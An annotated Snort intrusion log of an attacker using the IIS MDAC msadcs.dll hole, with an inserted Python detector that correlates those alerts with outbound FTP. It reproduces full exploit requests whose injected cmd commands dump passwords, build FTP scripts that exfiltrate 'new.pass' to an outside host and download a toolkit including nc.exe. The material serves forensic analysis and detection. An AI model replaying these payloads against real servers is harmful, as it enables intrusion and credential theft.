[**] FTP control channel [**]
02/04-05:33:35.318867 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:33399 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CB63441 Ack: 0x2D782EBA Win: 0x2130 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP session terminates with nothing downloaded
[**] FTP control channel [**]
02/04-05:33:35.366953 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44715 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2D782EBA Ack: 0x2CB63447 Win: 0x832C TcpLen: 20
221 Goodbye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run pdump and append its output to the file 'new.pass'
!@# Since pdump.exe was never downloaded, this must fail
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:51.024741 213.116.251.162:1793 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11215 IpLen:20 DgmLen:749 DF
***AP*** Seq: 0x95FDA7E9 Ack: 0x2CB67169 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 555..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 346..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.d.u.m.p...e.x.e. .>.>. .n.e.w...p.a.s.s.".).|.'.......d.r.i.v.e
.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d
.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u
.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD
!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to begin a new FTP script called ftpcom2
!@# The purpose of this script is to FTP the file 'new.pass' to nether.net
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:01.106135 213.116.251.162:1795 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11227 IpLen:20 DgmLen:761 DF
***AP*** Seq: 0x9625AE88 Ack: 0x2CB698E2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 567..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 358..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.2.".).|.'....
...d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r
. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\
.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!RO
X!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:08.113472 213.116.251.162:1797 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11238 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x9641CA4E Ack: 0x2CB6B430 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 565..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 356..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.2.".).|.'......
.d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r.
.(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h
.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!
YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:15.232822 213.116.251.162:1799 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11249 IpLen:20 DgmLen:753 DF
***AP*** Seq: 0x965E643C Ack: 0x2CB6D00A Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 559..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 350..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.u.t. .n.e.w...p.a.s.s. .>.>. .f.t.p.c.o.m.2.".).|.'.......d.r.i
.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*..
.m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\
.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!W
ORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:22.322873 213.116.251.162:1801 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11260 IpLen:20 DgmLen:747 DF
***AP*** Seq: 0x967B00EF Ack: 0x2CB6EBC6 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 553..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 344..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.2.".).|.'.......d.r.i.v.e.r
.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b
.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t
.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!-
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to start scripted FTP session with new script file
!@# Uses -n switch to suppress auto-login
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:29.400851 213.116.251.162:1803 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11271 IpLen:20 DgmLen:771 DF
***AP*** Seq: 0x9697470F Ack: 0x2CB7076E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 577..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 368..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m.2. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t."
.).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D
.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p
.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;..
.--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.041264 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44720 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x361B134A Ack: 0x2CB70BAB Win: 0x832C TcpLen: 20
220 freenet.nether.net FTP server (SunOS 5.7) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.048140 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:49527 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CB70BAB Ack: 0x361B1380 Win: 0x2202 TcpLen: 20
USER johna2k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.101821 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44722 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x361B1380 Ack: 0x2CB70BB9 Win: 0x832C TcpLen: 20
331 Password required for johna2k...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.107508 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:49783 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CB70BB9 Ack: 0x361B13A4 Win: 0x21DE TcpLen: 20
PASS hacker2000..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP fails again due to login problems
!@# When nothing shows up on the FTP server, the intruder will know something is wrong
[**] FTP control channel [**]
02/04-05:34:30.163799 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44723 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x361B13A4 Ack: 0x2CB70BCA Win: 0x832C TcpLen: 20
530 Login incorrect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.169909 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:50039 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CB70BCA Ack: 0x361B13BA Win: 0x21C8 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.216281 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44724 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x361B13BA Ack: 0x2CB70BD0 Win: 0x832C TcpLen: 20
221 Goodbye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to open an FTP connection to his own machine.
!@# This would prove that the machine CAN make FTP connections
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:47.612437 213.116.251.162:1808 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11326 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x96E03E47 Ack: 0x2CB74E64 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .2.1.3...1.1.6...2.5.1...1.6.2.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:48.747703 213.116.251.162:21 -> 172.16.1.106:3139
TCP TTL:111 TOS:0x0 ID:11332 IpLen:20 DgmLen:90 DF
***AP*** Seq: 0x96E52E89 Ack: 0x2CB7522F Win: 0x2238 TcpLen: 20
220-Serv-U FTP-Server v2.5h for WinSock ready.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Interesting FTP Banner
[**] FTP control channel [**]
02/04-05:34:49.294990 213.116.251.162:21 -> 172.16.1.106:3139
TCP TTL:111 TOS:0x0 ID:11333 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x96E52EBB Ack: 0x2CB7522F Win: 0x2238 TcpLen: 20
220--------H-A-C-K T-H-E P-L-A-N-E-T--------..220-W3|_c0m3 T0
JohnA's 0d4y Ef-Tee-Pee S3rv3r...220-Featuring 100% elite hax0r
warez!@$#@..220-Im running win 95 (Release candidate 1), on a p3
3, with 16mb Ram...220 -------H-A-C-K T-H-E P-L-A-N-E-T-------
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
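Every FTP session in this log is the web server connecting out to port 21 within about a second of an msadcs.dll POST, first to nether.net and then, as the note above says, to the attacker's own host to prove the machine can make FTP connections. That pairing is a detection rule in itself: a web server has no business opening outbound FTP sessions, and one that does so right after an RDS alert is almost certainly executing attacker commands. The following Python is an added example (not from the original log or its author) that correlates the two alert types over packet header lines transcribed from the log above; the web server address, the correlation window and the alert list are constructed inputs.

```python
from datetime import datetime, timedelta

WEB_SERVER = "172.16.1.106"       # constructed config: the IIS host in this capture
WINDOW = timedelta(seconds=10)    # constructed: max gap between an RDS alert and related egress

# Constructed sample: (alert name, packet header) pairs transcribed from the log above.
SAMPLE_ALERTS = [
    ("Outbound http Response", "02/04-05:25:14.555344 172.16.1.106:80 -> 213.116.251.162:1764"),
    ("WEB-IIS msadc/msadcs.dll access", "02/04-05:33:33.995519 213.116.251.162:1791 -> 172.16.1.106:80"),
    ("FTP control channel", "02/04-05:33:34.938125 204.42.253.18:21 -> 172.16.1.106:3135"),
    ("FTP control channel", "02/04-05:33:34.944019 172.16.1.106:3135 -> 204.42.253.18:21"),
    ("FTP control channel", "02/04-05:33:35.366953 204.42.253.18:21 -> 172.16.1.106:3135"),
    ("WEB-IIS msadc/msadcs.dll access", "02/04-05:34:47.612437 213.116.251.162:1808 -> 172.16.1.106:80"),
    ("FTP control channel", "02/04-05:34:48.747703 213.116.251.162:21 -> 172.16.1.106:3139"),
]


def parse_header(line: str):
    """Parse a Snort 'MM/DD-HH:MM:SS.usec src:port -> dst:port' header line."""
    ts, src, _, dst = line.split()
    when = datetime.strptime(ts, "%m/%d-%H:%M:%S.%f")   # year is absent; deltas within a day still work
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return when, sip, int(sport), dip, int(dport)


def correlate_egress(alerts, web_server=WEB_SERVER, window=WINDOW):
    """Emit one finding per FTP session (remote ip, local port) in which the web server
    talks to a remote port 21, attributing it to the most recent msadcs.dll alert within
    `window` and noting whether the FTP server is the host that sent that alert's request."""
    last_rds = None          # (time, source ip of the RDS request)
    seen = set()
    findings = []
    for name, header in alerts:
        when, sip, sport, dip, dport = parse_header(header)
        if "msadcs.dll" in name:
            last_rds = (when, sip)
            continue
        if name != "FTP control channel":
            continue
        # Orient the packet so we know which end is the web server and which is remote.
        if sip == web_server:
            remote_ip, remote_port, local_port = dip, dport, sport
        elif dip == web_server:
            remote_ip, remote_port, local_port = sip, sport, dport
        else:
            continue
        if remote_port != 21:
            continue
        key = (remote_ip, local_port)
        if key in seen:
            continue
        seen.add(key)
        finding = {"ftp_server": remote_ip, "first_seen": when,
                   "triggered_by": None, "to_attacker_host": False}
        if last_rds and timedelta(0) <= when - last_rds[0] <= window:
            finding["triggered_by"] = last_rds[0]
            finding["to_attacker_host"] = remote_ip == last_rds[1]
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in correlate_egress(SAMPLE_ALERTS):
        print(f)
```

The mitigation the second finding points at is egress filtering: had the web server been denied outbound connections to port 21 (and outbound connections generally), none of the three FTP sessions in this log would have completed, and the attacker would have had no channel to bring a toolkit in or carry a password dump out, whatever msadcs.dll let them execute.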
!@# Uses MDAC vulnerability to start a new FTP script for his/her own FTP server, overwriting file 'ftpcom'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:30.010659 213.116.251.162:1812 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11353 IpLen:20 DgmLen:775 DF
***AP*** Seq: 0x9868B053 Ack: 0x2CB8DE58 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 581..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 372..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .o.p.e.n. .2.1.3...1.1.6...2.5.1...1.6.2. .>. .f.t.p.c.o
.m.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s
. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e
.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b
.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Adds username to FTP script, overwriting previous line.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:37.316228 213.116.251.162:1814 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11365 IpLen:20 DgmLen:749 DF
***AP*** Seq: 0x988652BC Ack: 0x2CB8FAFA Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 555..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 346..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e
.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d
.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u
.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD
!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:44.409331 213.116.251.162:1816 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11376 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x98A2F1C0 Ack: 0x2CB916AC Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# This script is designed to grab the toolkit
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:53.648139 213.116.251.162:1821 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11431 IpLen:20 DgmLen:767 DF
***AP*** Seq: 0x98C4BF01 Ack: 0x2CB93580 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 573..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 364..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:01.033430 213.116.251.162:1825 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11482 IpLen:20 DgmLen:763 DF
***AP*** Seq: 0x98E8BAF1 Ack: 0x2CB95788 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 569..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 360..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'..
.....d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e
.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s
.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!
ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:08.382549 213.116.251.162:1827 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11493 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x99063709 Ack: 0x2CB9743F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:15.487857 213.116.251.162:1829 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11504 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x9922916D Ack: 0x2CB9900F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
